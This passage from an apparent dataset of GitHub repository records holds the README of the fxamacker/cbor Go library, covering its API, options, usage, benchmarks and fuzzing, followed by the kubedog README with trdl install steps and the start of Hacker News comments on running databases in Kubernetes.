\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## API\nMany function signatures are identical to Go's encoding/json, such as: \n`Marshal`, `Unmarshal`, `NewEncoder`, `NewDecoder`, `(*Encoder).Encode`, and `(*Decoder).Decode`.\n\nInterfaces identical or comparable to Go's encoding, encoding/json, or encoding/gob include: \n`Marshaler`, `Unmarshaler`, `BinaryMarshaler`, and `BinaryUnmarshaler`.\n\nLike `encoding/json`, `RawMessage` can be used to delay CBOR decoding or precompute CBOR encoding.\n\n\"Mode\" in this API means defined way of encoding or decoding -- it links the standard API to CBOR options and CBOR tags.\n\nEncMode and DecMode are interfaces created from EncOptions or DecOptions structs. \nFor example, `em, err := cbor.EncOptions{...}.EncMode()` or `em, err := cbor.CanonicalEncOptions().EncMode()`.\n\nEncMode and DecMode use immutable options so their behavior won't accidentally change at runtime. Modes are intended to be reused and are safe for concurrent use.\n\n__API for Default Mode__\n\nIf default options are acceptable, then you don't need to create EncMode or DecMode.\n\n```go\nMarshal(v interface{}) ([]byte, error)\nNewEncoder(w io.Writer) *Encoder\n\nUnmarshal(data []byte, v interface{}) error\nNewDecoder(r io.Reader) *Decoder\n```\n\n__API for Creating & Using Encoding Modes__\n\n```go\n// EncMode interface uses immutable options and is safe for concurrent use.\ntype EncMode interface {\n\tMarshal(v interface{}) ([]byte, error)\n\tNewEncoder(w io.Writer) *Encoder\n\tEncOptions() EncOptions // returns copy of options\n}\n\n// EncOptions specifies encoding options.\ntype EncOptions struct {\n...\n}\n\n// EncMode returns an EncMode interface created from EncOptions.\nfunc (opts EncOptions) EncMode() (EncMode, error) {}\n\n// EncModeWithTags returns EncMode with options and tags that are both immutable. \nfunc (opts EncOptions) EncModeWithTags(tags TagSet) (EncMode, error) {}\n\n// EncModeWithSharedTags returns EncMode with immutable options and mutable shared tags. \nfunc (opts EncOptions) EncModeWithSharedTags(tags TagSet) (EncMode, error) {}\n```\n\nThe empty curly braces prevent a syntax highlighting bug, please ignore them.\n\n__API for Predefined Encoding Options__\n\n```go\nfunc CoreDetEncOptions() EncOptions {} // RFC 8949 Core Deterministic Encoding\nfunc PreferredUnsortedEncOptions() EncOptions {} // RFC 8949 Preferred Serialization\nfunc CanonicalEncOptions() EncOptions {} // RFC 7049 Canonical CBOR\nfunc CTAP2EncOptions() EncOptions {} // FIDO2 CTAP2 Canonical CBOR\n```\n\n__API for Creating & Using Decoding Modes__\n\n```go\n// DecMode interface uses immutable options and is safe for concurrent use.\ntype DecMode interface {\n\tUnmarshal(data []byte, v interface{}) error\n\tNewDecoder(r io.Reader) *Decoder\n\tDecOptions() DecOptions // returns copy of options\n}\n\n// DecOptions specifies decoding options.\ntype DecOptions struct {\n...\n}\n\n// DecMode returns a DecMode interface created from DecOptions.\nfunc (opts DecOptions) DecMode() (DecMode, error) {}\n\n// DecModeWithTags returns DecMode with options and tags that are both immutable. \nfunc (opts DecOptions) DecModeWithTags(tags TagSet) (DecMode, error) {}\n\n// DecModeWithSharedTags returns DecMode with immutable options and mutable shared tags. \nfunc (opts DecOptions) DecModeWithSharedTags(tags TagSet) (DecMode, error) {}\n```\n\nThe empty curly braces prevent a syntax highlighting bug, please ignore them.\n\n__API for Using CBOR Tags__\n\n`TagSet` can be used to associate user-defined Go type(s) to tag number(s). It's also used to create EncMode or DecMode. For example, `em := EncOptions{...}.EncModeWithTags(ts)` or `em := EncOptions{...}.EncModeWithSharedTags(ts)`. This allows every standard API exported by em (like `Marshal` and `NewEncoder`) to use the specified tags automatically.\n\n`Tag` and `RawTag` can be used to encode/decode a tag number with a Go value, but `TagSet` is generally recommended.\n\n```go\ntype TagSet interface {\n // Add adds given tag number(s), content type, and tag options to TagSet.\n Add(opts TagOptions, contentType reflect.Type, num uint64, nestedNum ...uint64) error\n\n // Remove removes given tag content type from TagSet.\n Remove(contentType reflect.Type) \n}\n```\n\n`Tag` and `RawTag` types can also be used to encode/decode tag number with Go value.\n\n```go\ntype Tag struct {\n Number uint64\n Content interface{}\n}\n\ntype RawTag struct {\n Number uint64\n Content RawMessage\n}\n```\n\nSee [API docs (godoc.org)](https://godoc.org/github.com/fxamacker/cbor/v2) for more details and more functions. See [Usage section](#usage) for usage and code examples.\n\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Options\n\nStruct tags, decoding options, and encoding options.\n\n### Struct Tags\n\nThis library supports both \"cbor\" and \"json\" key for some (not all) struct tags. If \"cbor\" and \"json\" keys are both present for the same field, then \"cbor\" key will be used.\n\n| Key | Format Str | Scope | Description |\n| --- | ---------- | ----- | ------------|\n| cbor or json | \"myName\" | field | Name of field to use such as \"myName\", etc. like encoding/json. |\n| cbor or json | \",omitempty\" | field | Omit (ignore) this field if value is empty, like encoding/json. |\n| cbor or json | \"-\" | field | Omit (ignore) this field always, like encoding/json. |\n| cbor | \",keyasint\" | field | Treat field as an element of CBOR map with specified int as key. |\n| cbor | \",toarray\" | struct | Treat each field as an element of CBOR array. This automatically disables \"omitempty\" and \"keyasint\" for all fields in the struct. |\n\nThe \"keyasint\" struct tag requires an integer key to be specified:\n\n```\ntype myStruct struct {\n MyField int64 `cbor:\"-1,keyasint,omitempty'`\n OurField string `cbor:\"0,keyasint,omitempty\"`\n FooField Foo `cbor:\"5,keyasint,omitempty\"`\n BarField Bar `cbor:\"hello,omitempty\"`\n ...\n}\n```\n\nThe \"toarray\" struct tag requires a special field \"_\" (underscore) to indicate \"toarray\" applies to the entire struct:\n\n```\ntype myStruct struct {\n _ struct{} `cbor:\",toarray\"`\n MyField int64\n OurField string\n ...\n}\n```\n\n__Click to expand:__\n\n
\n Example Using CBOR Web Tokens

\n \n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_struct_tags_api.svg?sanitize=1 \"CBOR API and Go Struct Tags\")\n\n

\n\n### Decoding Options\n\n| DecOptions.TimeTag | Description |\n| ------------------ | ----------- |\n| DecTagIgnored (default) | Tag numbers are ignored (if present) for time values. |\n| DecTagOptional | Tag numbers are only checked for validity if present for time values. |\n| DecTagRequired | Tag numbers must be provided for time values except for CBOR Null and CBOR Undefined. |\n\nThe following CBOR time values are decoded as Go's \"zero time instant\":\n\n* CBOR Null\n* CBOR Undefined\n* CBOR floating-point NaN\n* CBOR floating-point Infinity\n\nGo's `time` package provides `IsZero` function, which reports whether t represents \"zero time instant\" \n(January 1, year 1, 00:00:00 UTC).\n\n
\n\n| DecOptions.DupMapKey | Description |\n| -------------------- | ----------- |\n| DupMapKeyQuiet (default) | turns off detection of duplicate map keys. It uses a \"keep fastest\" method by choosing either \"keep first\" or \"keep last\" depending on the Go data type. |\n| DupMapKeyEnforcedAPF | enforces detection and rejection of duplidate map keys. Decoding stops immediately and returns `DupMapKeyError` when the first duplicate key is detected. The error includes the duplicate map key and the index number. |\n\n`DupMapKeyEnforcedAPF` uses \"Allow Partial Fill\" so the destination map or struct can contain some decoded values at the time of error. Users can respond to the `DupMapKeyError` by discarding the partially filled result if that's required by their protocol.\n\n
\n\n| DecOptions.IntDec | Description |\n| ------------------ | ----------- |\n| IntDecConvertNone (default) | When decoding to Go interface{}, CBOR positive int (major type 0) decode to uint64 value, and CBOR negative int (major type 1) decode to int64 value. |\n| IntDecConvertSigned | When decoding to Go interface{}, CBOR positive/negative int (major type 0 and 1) decode to int64 value. |\n\nIf `IntDecConvertedSigned` is used and value overflows int64, UnmarshalTypeError is returned.\n\n
\n\n| DecOptions.IndefLength | Description |\n| ---------------------- | ----------- |\n|IndefLengthAllowed (default) | allow indefinite length data |\n|IndefLengthForbidden | forbid indefinite length data |\n\n
\n\n| DecOptions.TagsMd | Description |\n| ----------------- | ----------- |\n|TagsAllowed (default) | allow CBOR tags (major type 6) |\n|TagsForbidden | forbid CBOR tags (major type 6) |\n\n
\n\n| DecOptions.ExtraReturnErrors | Description |\n| ----------------- | ----------- |\n|ExtraDecErrorNone (default) | no extra decoding errors. E.g. ignore unknown fields if encountered. |\n|ExtraDecErrorUnknownField | return error if unknown field is encountered |\n\n
\n\n| DecOptions.MaxNestedLevels | Description |\n| -------------------------- | ----------- |\n| 32 (default) | allowed setting is [4, 65535] |\n\n
\n\n| DecOptions.MaxArrayElements | Description |\n| --------------------------- | ----------- |\n| 131072 (default) | allowed setting is [16, 2147483647] |\n\n
\n\n| DecOptions.MaxMapPairs | Description |\n| ---------------------- | ----------- |\n| 131072 (default) | allowed setting is [16, 2147483647] |\n\n### Encoding Options\n\n__Integers always encode to the shortest form that preserves value__. Encoding of other data types and map key sort order are determined by encoding options.\n\nThese functions are provided to create and return a modifiable EncOptions struct with predefined settings.\n\n| Predefined EncOptions | Description |\n| --------------------- | ----------- |\n| CanonicalEncOptions() |[Canonical CBOR (RFC 7049 Section 3.9)](https://tools.ietf.org/html/rfc7049#section-3.9). |\n| CTAP2EncOptions() |[CTAP2 Canonical CBOR (FIDO2 CTAP2)](https://fidoalliance.org/specs/fido-v2.0-id-20180227/fido-client-to-authenticator-protocol-v2.0-id-20180227.html#ctap2-canonical-cbor-encoding-form). |\n| PreferredUnsortedEncOptions() |Unsorted, encode float64->float32->float16 when values fit, NaN values encoded as float16 0x7e00. |\n| CoreDetEncOptions() |PreferredUnsortedEncOptions() + map keys are sorted bytewise lexicographic. |\n\n
\n\n| EncOptions.Sort | Description |\n| --------------- | ----------- |\n| SortNone (default) |No sorting for map keys. |\n| SortLengthFirst |Length-first map key ordering. |\n| SortBytewiseLexical |Bytewise lexicographic map key ordering [(RFC 8949 Section 4.2.1)](https://datatracker.ietf.org/doc/html/rfc8949#section-4.2.1).|\n| SortCanonical |(alias) Same as SortLengthFirst [(RFC 7049 Section 3.9)](https://tools.ietf.org/html/rfc7049#section-3.9) |\n| SortCTAP2 |(alias) Same as SortBytewiseLexical [(CTAP2 Canonical CBOR)](https://fidoalliance.org/specs/fido-v2.0-id-20180227/fido-client-to-authenticator-protocol-v2.0-id-20180227.html#ctap2-canonical-cbor-encoding-form). |\n| SortCoreDeterministic |(alias) Same as SortBytewiseLexical [(RFC 8949 Section 4.2.1)](https://datatracker.ietf.org/doc/html/rfc8949#section-4.2.1). |\n\n
\n\n| EncOptions.Time | Description |\n| --------------- | ----------- |\n| TimeUnix (default) | (seconds) Encode as integer. |\n| TimeUnixMicro | (microseconds) Encode as floating-point. ShortestFloat option determines size. |\n| TimeUnixDynamic | (seconds or microseconds) Encode as integer if time doesn't have fractional seconds, otherwise encode as floating-point rounded to microseconds. |\n| TimeRFC3339 | (seconds) Encode as RFC 3339 formatted string. |\n| TimeRFC3339Nano | (nanoseconds) Encode as RFC3339 formatted string. |\n\n
\n\n| EncOptions.TimeTag | Description |\n| ------------------ | ----------- |\n| EncTagNone (default) | Tag number will not be encoded for time values. |\n| EncTagRequired | Tag number (0 or 1) will be encoded unless time value is undefined/zero-instant. |\n\nBy default, undefined (zero instant) time values will encode as CBOR Null without tag number for both EncTagNone and EncTagRequired. Although CBOR Undefined might be technically more correct for EncTagRequired, CBOR Undefined might not be supported by other generic decoders and it isn't supported by JSON.\n\nGo's `time` package provides `IsZero` function, which reports whether t represents the zero time instant, January 1, year 1, 00:00:00 UTC. \n\n
\n\n| EncOptions.BigIntConvert | Description |\n| ------------------------ | ----------- |\n| BigIntConvertShortest (default) | Encode big.Int as CBOR integer if value fits. |\n| BigIntConvertNone | Encode big.Int as CBOR bignum (tag 2 or 3). |\n\n
\n\n__Floating-Point Options__\n\nEncoder has 3 types of options for floating-point data: ShortestFloatMode, InfConvertMode, and NaNConvertMode.\n\n| EncOptions.ShortestFloat | Description |\n| ------------------------ | ----------- |\n| ShortestFloatNone (default) | No size conversion. Encode float32 and float64 to CBOR floating-point of same bit-size. |\n| ShortestFloat16 | Encode float64 -> float32 -> float16 ([IEEE 754 binary16](https://en.wikipedia.org/wiki/Half-precision_floating-point_format)) when values fit. |\n\nConversions for infinity and NaN use InfConvert and NaNConvert settings.\n\n| EncOptions.InfConvert | Description |\n| --------------------- | ----------- |\n| InfConvertFloat16 (default) | Convert +- infinity to float16 since they always preserve value (recommended) |\n| InfConvertNone |Don't convert +- infinity to other representations -- used by CTAP2 Canonical CBOR |\n\n
\n\n| EncOptions.NaNConvert | Description |\n| --------------------- | ----------- |\n| NaNConvert7e00 (default) | Encode to 0xf97e00 (CBOR float16 = 0x7e00) -- used by RFC 8949 Preferred Encoding, etc. |\n| NaNConvertNone | Don't convert NaN to other representations -- used by CTAP2 Canonical CBOR. |\n| NaNConvertQuiet | Force quiet bit = 1 and use shortest form that preserves NaN payload. |\n| NaNConvertPreserveSignal | Convert to smallest form that preserves value (quit bit unmodified and NaN payload preserved). |\n\n
\n\n| EncOptions.IndefLength | Description |\n| ---------------------- | ----------- |\n|IndefLengthAllowed (default) | allow indefinite length data |\n|IndefLengthForbidden | forbid indefinite length data |\n\n
\n\n| EncOptions.TagsMd | Description |\n| ----------------- | ----------- |\n|TagsAllowed (default) | allow CBOR tags (major type 6) |\n|TagsForbidden | forbid CBOR tags (major type 6) |\n\n\n### Tag Options\n\nTagOptions specifies how encoder and decoder handle tag number registered with TagSet.\n\n| TagOptions.DecTag | Description |\n| ------------------ | ----------- |\n| DecTagIgnored (default) | Tag numbers are ignored (if present). |\n| DecTagOptional | Tag numbers are only checked for validity if present. |\n| DecTagRequired | Tag numbers must be provided except for CBOR Null and CBOR Undefined. |\n\n
\n\n| TagOptions.EncTag | Description |\n| ------------------ | ----------- |\n| EncTagNone (default) | Tag number will not be encoded. |\n| EncTagRequired | Tag number will be encoded. |\n\t\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Usage\n\ud83d\udee1\ufe0f Use Go's `io.LimitReader` to limit size when decoding very large or indefinite size data.\n\nFunctions with identical signatures to encoding/json include: \n`Marshal`, `Unmarshal`, `NewEncoder`, `NewDecoder`, `(*Encoder).Encode`, `(*Decoder).Decode`.\n\n__Default Mode__ \n\nIf default options are acceptable, package level functions can be used for encoding and decoding.\n\n```go\nb, err := cbor.Marshal(v) // encode v to []byte b\n\nerr := cbor.Unmarshal(b, &v) // decode []byte b to v\n\nencoder := cbor.NewEncoder(w) // create encoder with io.Writer w\n\ndecoder := cbor.NewDecoder(r) // create decoder with io.Reader r\n```\n\n__Modes__\n\nIf you need to use options or CBOR tags, then you'll want to create a mode.\n\n\"Mode\" means defined way of encoding or decoding -- it links the standard API to your CBOR options and CBOR tags. This way, you don't pass around options and the API remains identical to `encoding/json`.\n\nEncMode and DecMode are interfaces created from EncOptions or DecOptions structs. \nFor example, `em, err := cbor.EncOptions{...}.EncMode()` or `em, err := cbor.CanonicalEncOptions().EncMode()`.\n\nEncMode and DecMode use immutable options so their behavior won't accidentally change at runtime. Modes are reusable, safe for concurrent use, and allow fast parallelism.\n\n__Creating and Using Encoding Modes__\n\nEncMode is an interface ([API](#api)) created from EncOptions struct. EncMode uses immutable options after being created and is safe for concurrent use. For best performance, EncMode should be reused.\n\n```go\n// Create EncOptions using either struct literal or a function.\nopts := cbor.CanonicalEncOptions()\n\n// If needed, modify opts. For example: opts.Time = cbor.TimeUnix\n\n// Create reusable EncMode interface with immutable options, safe for concurrent use.\nem, err := opts.EncMode() \n\n// Use EncMode like encoding/json, with same function signatures.\nb, err := em.Marshal(v) // encode v to []byte b\n\nencoder := em.NewEncoder(w) // create encoder with io.Writer w\nerr := encoder.Encode(v) // encode v to io.Writer w\n```\n\n__Struct Tags (keyasint, toarray, omitempty)__\n\nThe `keyasint`, `toarray`, and `omitempty` struct tags make it easy to use compact CBOR message formats. Internet standards often use CBOR arrays and CBOR maps with int keys to save space.\n\n
\n\n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_struct_tags_api.svg?sanitize=1 \"CBOR API and Struct Tags\")\n\n
\n\n__Decoding CWT (CBOR Web Token)__ using `keyasint` and `toarray` struct tags:\n\n```go\n// Signed CWT is defined in RFC 8392\ntype signedCWT struct {\n\t_ struct{} `cbor:\",toarray\"`\n\tProtected []byte\n\tUnprotected coseHeader\n\tPayload []byte\n\tSignature []byte\n}\n\n// Part of COSE header definition\ntype coseHeader struct {\n\tAlg int `cbor:\"1,keyasint,omitempty\"`\n\tKid []byte `cbor:\"4,keyasint,omitempty\"`\n\tIV []byte `cbor:\"5,keyasint,omitempty\"`\n}\n\n// data is []byte containing signed CWT\n\nvar v signedCWT\nif err := cbor.Unmarshal(data, &v); err != nil {\n\treturn err\n}\n```\n\n__Encoding CWT (CBOR Web Token)__ using `keyasint` and `toarray` struct tags:\n\n```go\n// Use signedCWT struct defined in \"Decoding CWT\" example.\n\nvar v signedCWT\n...\nif data, err := cbor.Marshal(v); err != nil {\n\treturn err\n}\n```\n\n__Encoding and Decoding CWT (CBOR Web Token) with CBOR Tags__\n\n```go\n// Use signedCWT struct defined in \"Decoding CWT\" example.\n\n// Create TagSet (safe for concurrency).\ntags := cbor.NewTagSet()\n// Register tag COSE_Sign1 18 with signedCWT type.\ntags.Add(\t\n\tcbor.TagOptions{EncTag: cbor.EncTagRequired, DecTag: cbor.DecTagRequired}, \n\treflect.TypeOf(signedCWT{}), \n\t18)\n\n// Create DecMode with immutable tags.\ndm, _ := cbor.DecOptions{}.DecModeWithTags(tags)\n\n// Unmarshal to signedCWT with tag support.\nvar v signedCWT\nif err := dm.Unmarshal(data, &v); err != nil {\n\treturn err\n}\n\n// Create EncMode with immutable tags.\nem, _ := cbor.EncOptions{}.EncModeWithTags(tags)\n\n// Marshal signedCWT with tag number.\nif data, err := cbor.Marshal(v); err != nil {\n\treturn err\n}\n```\n\nFor more examples, see [examples_test.go](example_test.go).\n\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Comparisons\n\nComparisons are between this newer library and a well-known library that had 1,000+ stars before this library was created. Default build settings for each library were used for all comparisons.\n\n__This library is safer__. Small malicious CBOR messages are rejected quickly before they exhaust system resources.\n\nDecoding 9 or 10 bytes of malformed CBOR data shouldn't exhaust memory. For example, \n`[]byte{0x9B, 0x00, 0x00, 0x42, 0xFA, 0x42, 0xFA, 0x42, 0xFA, 0x42}`\n\n| | Decode bad 10 bytes to interface{} | Decode bad 10 bytes to []byte |\n| :--- | :------------------ | :--------------- |\n| fxamacker/cbor
1.0-2.3 | 49.44 ns/op, 24 B/op, 2 allocs/op* | 51.93 ns/op, 32 B/op, 2 allocs/op* |\n| ugorji/go 1.2.6 | \u26a0\ufe0f 45021 ns/op, 262852 B/op, 7 allocs/op | \ud83d\udca5 runtime: out of memory: cannot allocate |\n| ugorji/go 1.1.0-1.1.7 | \ud83d\udca5 runtime: out of memory: cannot allocate | \ud83d\udca5 runtime: out of memory: cannot allocate|\n\n*Speed and memory are for latest codec version listed in the row (compiled with Go 1.17.5).\n\nfxamacker/cbor CBOR safety settings include: MaxNestedLevels, MaxArrayElements, MaxMapPairs, and IndefLength.\n\n__This library is smaller__. Programs like senmlCat can be 4 MB smaller by switching to this library. Programs using more complex CBOR data types can be 9.2 MB smaller.\n\n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_size_comparison.svg?sanitize=1 \"CBOR speed comparison chart\")\n\n\n__This library is faster__ for encoding and decoding CBOR Web Token (CWT). However, speed is only one factor and it can vary depending on data types and sizes. Unlike the other library, this one doesn't use Go's ```unsafe``` package or code gen.\n\n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_speed_comparison.svg?sanitize=1 \"CBOR speed comparison chart\")\n\n__This library uses less memory__ for encoding and decoding CBOR Web Token (CWT) using test data from RFC 8392 A.1.\n\n| | fxamacker/cbor 2.3 | ugorji/go 1.2.6 |\n| :--- | :--- | :--- | \n| Encode CWT | 0.18 kB/op         2 allocs/op | 1.35 kB/op         4 allocs/op |\n| Decode CWT | 160 bytes/op     6 allocs/op | 744 bytes/op     6 allocs/op |\n\nRunning your own benchmarks is highly recommended. Use your most common data structures and data sizes.\n\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Benchmarks\n\nGo structs are faster than maps with string keys:\n\n* decoding into struct is >28% faster than decoding into map.\n* encoding struct is >35% faster than encoding map.\n\nGo structs with `keyasint` struct tag are faster than maps with integer keys:\n\n* decoding into struct is >28% faster than decoding into map.\n* encoding struct is >34% faster than encoding map.\n\nGo structs with `toarray` struct tag are faster than slice:\n\n* decoding into struct is >15% faster than decoding into slice.\n* encoding struct is >12% faster than encoding slice.\n\nDoing your own benchmarks is highly recommended. Use your most common message sizes and data types.\n\nSee [Benchmarks for fxamacker/cbor](CBOR_BENCHMARKS.md).\n\n## Fuzzing and Code Coverage\n\n__Over 375 tests__ must pass on 4 architectures before tagging a release. They include all RFC 7049 and RFC 8949 examples, bugs found by fuzzing, maliciously crafted CBOR data, and over 87 tests with malformed data. There's some overlap in the tests but it isn't a high priority to trim tests.\n\n__Code coverage__ must not fall below 95% when tagging a release. Code coverage is above 98% (`go test -cover`) for cbor v2.3 which is among the highest for libraries (in Go) of this type.\n\n__Coverage-guided fuzzing__ must pass 1+ billion execs using a large corpus before tagging a release. Fuzzing is usually continued after the release is tagged and is manually stopped after reaching 1-3 billion execs. Fuzzing uses a customized version of [dvyukov/go-fuzz](https://github.com/dvyukov/go-fuzz).\n\nTo prevent delays to release schedules, fuzzing is not restarted for a release if changes are limited to ci, docs, and comments.\n\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Versions and API Changes\nThis project uses [Semantic Versioning](https://semver.org), so the API is always backwards compatible unless the major version number changes. \n\nThese functions have signatures identical to encoding/json and they will likely never change even after major new releases: \n`Marshal`, `Unmarshal`, `NewEncoder`, `NewDecoder`, `(*Encoder).Encode`, and `(*Decoder).Decode`.\n\nNewly added API documented as \"subject to change\" are excluded from SemVer.\n\nNewly added API in the master branch that has never been release tagged are excluded from SemVer.\n\n## Code of Conduct \nThis project has adopted the [Contributor Covenant Code of Conduct](CODE_OF_CONDUCT.md). Contact [faye.github@gmail.com](mailto:faye.github@gmail.com) with any questions or comments.\n\n## Contributing\nPlease refer to [How to Contribute](CONTRIBUTING.md).\n\n## Security Policy\nSecurity fixes are provided for the latest released version of fxamacker/cbor.\n\nFor the full text of the Security Policy, see [SECURITY.md](SECURITY.md).\n\n## Disclaimers\nPhrases like \"no crashes\", \"doesn't crash\", and \"is secure\" mean there are no known crash bugs in the latest version based on results of unit tests and coverage-guided fuzzing. They don't imply the software is 100% bug-free or 100% invulnerable to all known and unknown attacks.\n\nPlease read the license for additional disclaimers and terms.\n\n## Special Thanks\n\n__Making this library better__ \n\n* Stefan Tatschner for using this library in [sep](https://rumpelsepp.org/projects/sep), being the 1st to discover my CBOR library, requesting time.Time in issue #1, and submitting this library in a [PR to cbor.io](https://github.com/cbor/cbor.github.io/pull/56) on Aug 12, 2019.\n* Yawning Angel for using this library to [oasis-core](https://github.com/oasislabs/oasis-core), and requesting BinaryMarshaler in issue #5.\n* Jernej Kos for requesting RawMessage in issue #11 and offering feedback on v2.1 API for CBOR tags.\n* ZenGround0 for using this library in [go-filecoin](https://github.com/filecoin-project/go-filecoin), filing \"toarray\" bug in issue #129, and requesting \nCBOR BSTR <--> Go array in #133.\n* Keith Randall for [fixing Go bugs and providing workarounds](https://github.com/golang/go/issues/36400) so we don't have to wait for new versions of Go.\n\n__Help clarifying CBOR RFC 7049 or 7049bis (7049bis is the draft of RFC 8949)__\n\n* Carsten Bormann for RFC 7049 (CBOR), adding this library to cbor.io, his fast confirmation to my RFC 7049 errata, approving my pull request to 7049bis, and his patience when I misread a line in 7049bis.\n* Laurence Lundblade for his help on the IETF mailing list for 7049bis and for pointing out on a CBORbis issue that CBOR Undefined might be problematic translating to JSON.\n* Jeffrey Yasskin for his help on the IETF mailing list for 7049bis.\n\n__Words of encouragement and support__\n\n* Jakob Borg for his words of encouragement about this library at Go Forum. This is especially appreciated in the early stages when there's a lot of rough edges.\n\n\n## License \nCopyright \u00a9 2019-2022 [Faye Amacker](https://github.com/fxamacker). \n\nfxamacker/cbor is licensed under the MIT License. See [LICENSE](LICENSE) for the full license text. \n\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "werf/kubedog", "link": "https://github.com/werf/kubedog", "tags": ["cicd", "helm", "rollout", "follow", "kubectl", "devops", "werf", "watcher", "kubernetes"], "stars": 528, "description": "Library to watch and follow kubernetes resources in CI/CD deploy pipelines", "lang": "Go", "repo_lang": "", "readme": "

\n \n

\n\n# kubedog\n\nKubedog is a library to watch and follow Kubernetes resources in CI/CD deploy pipelines.\n\nThis library is used in the [werf CI/CD tool](https://github.com/werf/werf) to track resources during deploy process.\n\n**NOTE:** Kubedog also includes a CLI, however it provides a *minimal* interface to access library functions. CLI was created to check library features and for debug purposes. Currently, we have no plans on further improvement of CLI.\n\n## Table of Contents\n- [Install kubedog CLI](#install-kubedog-cli)\n - [Linux/macOS](#linuxmacos)\n - [Windows](#windows-powershell)\n - [Alternative binary installation](#alternative-binary-installation)\n- [Usage](#usage)\n- [Community](#community)\n- [License](#license)\n\n## Install `kubedog` CLI\n\n### Linux/macOS\n\n[Install trdl](https://github.com/werf/trdl/releases/) to `~/bin/trdl`, which will manage `kubedog` installation and updates. Add `~/bin` to your $PATH.\n\nAdd `kubedog` repo to `trdl`:\n```shell\ntrdl add kubedog https://tuf.kubedog.werf.io 1 2cc56abdc649a9699074097ba60206f1299e43b320d6170c40eab552dcb940d9e813a8abf5893ff391d71f0a84b39111ffa6403a3e038b81634a40d29674a531\n```\n\nTo use `kubedog` on a workstation we recommend setting up `kubedog` _automatic activation_. For this the activation command should be executed for each new shell session. Often this is achieved by adding the activation command to `~/.bashrc` (for Bash), `~/.zshrc` (for Zsh) or to the one of the profile files, but this depends on the OS/shell/terminal. Refer to your shell/terminal manuals for more information.\n\nThis is the `kubedog` activation command for the current shell-session:\n```shell\nsource \"$(trdl use kubedog 0 stable)\"\n```\n\nTo use `kubedog` in CI prefer activating `kubedog` manually instead. For this execute the activation command in the beginning of your CI job, before calling the `kubedog` binary.\n\n### Windows (PowerShell)\n\nFollowing instructions should be executed in PowerShell.\n\n[Install trdl](https://github.com/werf/trdl/releases/) to `:\\Users\\\\bin\\trdl`, which will manage `kubedog` installation and updates. Add `:\\Users\\\\bin\\` to your $PATH environment variable.\n\nAdd `kubedog` repo to `trdl`:\n```powershell\ntrdl add kubedog https://tuf.kubedog.werf.io 1 2cc56abdc649a9699074097ba60206f1299e43b320d6170c40eab552dcb940d9e813a8abf5893ff391d71f0a84b39111ffa6403a3e038b81634a40d29674a531\n```\n\nTo use `kubedog` on a workstation we recommend setting up `kubedog` _automatic activation_. For this the activation command should be executed for each new PowerShell session. For PowerShell this is usually achieved by adding the activation command to [$PROFILE file](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles).\n\nThis is the `kubedog` activation command for the current PowerShell-session:\n```powershell\n. $(trdl use kubedog 0 stable)\n```\n\nTo use `kubedog` in CI prefer activating `kubedog` manually instead. For this execute the activation command in the beginning of your CI job, before calling the `kubedog` binary.\n\n### Alternative binary installation\n\nThe recommended way to install `kubedog` is described above. Alternatively, although not recommended, you can download `kubedog` binary straight from the [GitHub Releases page](https://github.com/werf/kubedog/releases/), optionally verifying the binary with the PGP signature.\n\n## Usage\n\n* [CLI usage](doc/usage.md#cli-usage)\n* [Library usage: Multitracker](doc/usage.md#Multitracker)\n\n## Community\n\nPlease feel free to reach us via [project's Discussions](https://github.com/werf/kubedog/discussions) and [werf's Telegram group](https://t.me/werf_io) (there's [another one in Russian](https://t.me/werf_ru) as well).\n\nYou're also welcome to follow [@werf_io](https://twitter.com/werf_io) to stay informed about all important news, articles, etc.\n\n## License\n\nKubedog is an Open Source project licensed under the [Apache License](https://www.apache.org/licenses/LICENSE-2.0).\n", "readme_type": "markdown", "hn_comments": "Do not try to run database using bare kubernetes objects.\nTry to see if some of the operators fit your need.Your main issue will be IO unless you use a host only PV and if you do that you are likely limiting you db instamce to a specific node which can have scaling and/or HA impacts. Most will go with a network based FS to back your db data, if that is the case your network IO will likely impact your db performance. For a dev or test env this might not be a problem but for prod it is usually a blocker.Can you or someone else elaborate on what issues you run into when running a database within Kubernetes? To be transparent, I have always ran my databases on dedicated or on AWS instances. I am interested in understanding what specific issues you have seen running DB instances within Kubernetes.I work at Zalando where we run hundreds of PostgreSQL database clusters on Kubernetes (on AWS) using our Postgres 